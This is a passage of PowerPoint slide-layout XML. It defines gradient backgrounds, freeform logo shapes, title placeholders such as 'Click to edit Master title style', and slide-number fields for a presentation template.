          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD218AD2-AC83-ED53-2494-882208FDAB68}"/>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7" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C73D3806-2D03-1465-C70B-0C9144D84625}"/>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8" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{548109A3-907B-B669-2493-90F00EBAFC04}"/>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9" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC9BD2CE-1589-3828-8684-DE5D7B4D5248}"/>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10" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC440A27-C419-3B17-0669-BA0AE4631AF9}"/>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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25712810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Content_Light_Title_Center">
    <p:bg>
      <p:bgPr>
        <a:gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="006785"/>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="tx2"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="16200000" scaled="1"/>
          <a:tileRect/>
        </a:gra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96A0450-EC05-5906-0228-AF4CD558A326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8580699" y="0"/>
            <a:ext cx="3611301" cy="2622177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:schemeClr val="accent3">
                  <a:alpha val="73000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="52000">
                <a:schemeClr val="tx2">
                  <a:alpha val="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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B7C9EC1-253A-C67A-E32A-A1ABD47E1581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10798550" y="6539461"/>
            <a:ext cx="1097276" cy="163367"/>
            <a:chOff x="9041039" y="6539461"/>
            <a:chExt cx="1097276" cy="163367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C85B862B-D630-6269-4DC5-EBE154BCE025}"/>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7" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33584F34-F471-AFA9-53AB-38F39B3486F8}"/>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8" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5337169-B4C5-BA5C-F951-A79C1E824589}"/>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9" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16E9542F-14DC-1CB0-007D-F74C65545FF7}"/>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10" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A5A3453-F3E8-769B-935A-390398D0095F}"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49CB1C75-6DBA-95BE-937A-DBA029B29828}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="307640"/>
            <a:ext cx="11454980" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="Logo, icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4CA2E79-E058-05AE-68BC-857023BA509B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="16000"/>
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId3">
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="7964"/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:saturation sat="377000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="55342" b="60051"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1800000">
            <a:off x="-1901772" y="1004912"/>
            <a:ext cx="6479289" cy="6171847"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6479289"/>
              <a:gd name="connsiteY0" fmla="*/ 232645 h 6171847"/>
              <a:gd name="connsiteX1" fmla="*/ 402952 w 6479289"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6171847"/>
              <a:gd name="connsiteX2" fmla="*/ 4072618 w 6479289"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 6171847"/>
              <a:gd name="connsiteX3" fmla="*/ 6479289 w 6479289"/>
              <a:gd name="connsiteY3" fmla="*/ 4168477 h 6171847"/>
              <a:gd name="connsiteX4" fmla="*/ 6479289 w 6479289"/>
              <a:gd name="connsiteY4" fmla="*/ 4410761 h 6171847"/>
              <a:gd name="connsiteX5" fmla="*/ 3429000 w 6479289"/>
              <a:gd name="connsiteY5" fmla="*/ 6171847 h 6171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9289" h="6171847">
                <a:moveTo>
                  <a:pt x="0" y="232645"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="402952" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4072618" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6479289" y="4168477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6479289" y="4410761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3429000" y="6171847"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:pic>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chemeClr val="tx1"/>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tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1206397742"/>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Content_Light_Title_Center">
    <p:bg>
      <p:bgPr>
        <a:gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="35000">
              <a:schemeClr val="tx2"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="001D25"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="1"/>
          <a:tileRect/>
        </a:gra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3C9B44-B520-B44A-512E-5E916977D61B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-5128" y="0"/>
            <a:ext cx="5815119" cy="6952129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:schemeClr val="accent3">
                  <a:alpha val="9128"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="83000">
                <a:schemeClr val="accent6">
                  <a:alpha val="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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{150625A7-C515-A539-2620-B3A97398E20F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="1" y="-4"/>
            <a:ext cx="4114799" cy="6952129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:alpha val="46086"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="66000">
                <a:schemeClr val="tx2">
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="9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rgbClr val="415869"/>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rgbClr val="415869"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B7C9EC1-253A-C67A-E32A-A1ABD47E1581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10798550" y="6539461"/>
            <a:ext cx="1097276" cy="163367"/>
            <a:chOff x="9041039" y="6539461"/>
            <a:chExt cx="1097276" cy="163367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C85B862B-D630-6269-4DC5-EBE154BCE025}"/>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7" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33584F34-F471-AFA9-53AB-38F39B3486F8}"/>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8" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5337169-B4C5-BA5C-F951-A79C1E824589}"/>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9" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16E9542F-14DC-1CB0-007D-F74C65545FF7}"/>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10" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A5A3453-F3E8-769B-935A-390398D0095F}"/>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grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Logo, icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81C5945A-A9E1-6847-9F08-E98AD339CFF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="16000"/>
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId3">
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="7964"/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:saturation sat="377000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="55342" b="60051"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="19800000" flipH="1">
            <a:off x="7086616" y="358972"/>
            <a:ext cx="7174775" cy="6834332"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6479289"/>
              <a:gd name="connsiteY0" fmla="*/ 232645 h 6171847"/>
              <a:gd name="connsiteX1" fmla="*/ 402952 w 6479289"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6171847"/>
              <a:gd name="connsiteX2" fmla="*/ 4072618 w 6479289"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 6171847"/>
              <a:gd name="connsiteX3" fmla="*/ 6479289 w 6479289"/>
              <a:gd name="connsiteY3" fmla="*/ 4168477 h 6171847"/>
              <a:gd name="connsiteX4" fmla="*/ 6479289 w 6479289"/>
              <a:gd name="connsiteY4" fmla="*/ 4410761 h 6171847"/>
              <a:gd name="connsiteX5" fmla="*/ 3429000 w 6479289"/>
              <a:gd name="connsiteY5" fmla="*/ 6171847 h 6171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9289" h="6171847">
                <a:moveTo>
                  <a:pt x="0" y="232645"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="402952" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4072618" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6479289" y="4168477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6479289" y="4410761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3429000" y="6171847"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33FCEDCD-92A1-A73C-E6C2-B95BC9EF1A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="307640"/>
            <a:ext cx="11454980" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2156233254"/>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6_Title_Dark_2">
    <p:bg>
      <p:bgPr>
        <a:gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="tx1"/>
            </a:gs>
            <a:gs pos="98000">
              <a:schemeClr val="tx2"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="13500000" scaled="1"/>
          <a:tileRect/>
        </a:gradFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A blue background with circles&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8485698-100F-7F98-5457-AA28A9459F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="14865"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="12192"/>
            <a:ext cx="12192000" cy="6845808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9030D7CE-3EFB-ADE4-C1B7-CC32B991A559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325964" y="2171220"/>
            <a:ext cx="7557655" cy="2166240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="6600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Long title can go here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105512768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_Content_Light_Title_Center">
    <p:bg>
      <p:bgPr>
        <a:gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="35000">
              <a:schemeClr val="tx2"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="001D25"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="16200000" scaled="1"/>
          <a:tileRect/>
        </a:gradFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Logo, icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81C5945A-A9E1-6847-9F08-E98AD339CFF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="16000"/>
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId3">
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="7964"/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:saturation sat="377000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="55342" b="60051"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1800000">
            <a:off x="-2164540" y="444315"/>
            <a:ext cx="7174775" cy="6834332"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6479289"/>
              <a:gd name="connsiteY0" fmla="*/ 232645 h 6171847"/>
              <a:gd name="connsiteX1" fmla="*/ 402952 w 6479289"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6171847"/>
              <a:gd name="connsiteX2" fmla="*/ 4072618 w 6479289"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 6171847"/>
              <a:gd name="connsiteX3" fmla="*/ 6479289 w 6479289"/>
              <a:gd name="connsiteY3" fmla="*/ 4168477 h 6171847"/>
              <a:gd name="connsiteX4" fmla="*/ 6479289 w 6479289"/>
              <a:gd name="connsiteY4" fmla="*/ 4410761 h 6171847"/>
              <a:gd name="connsiteX5" fmla="*/ 3429000 w 6479289"/>
              <a:gd name="connsiteY5" fmla="*/ 6171847 h 6171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9289" h="6171847">
                <a:moveTo>
                  <a:pt x="0" y="232645"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="402952" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4072618" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6479289" y="4168477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6479289" y="4410761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3429000" y="6171847"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{283C9B44-B520-B44A-512E-5E916977D61B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-5128" y="0"/>
            <a:ext cx="5815119" cy="6952129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:schemeClr val="accent3">
                  <a:alpha val="9128"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="83000">
                <a:schemeClr val="accent6">
                  <a:alpha val="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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{150625A7-C515-A539-2620-B3A97398E20F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8668179" y="-5"/>
            <a:ext cx="3523821" cy="6952129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:alpha val="46086"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="66000">
                <a:schemeClr val="tx2">
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="9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chemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B7C9EC1-253A-C67A-E32A-A1ABD47E1581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
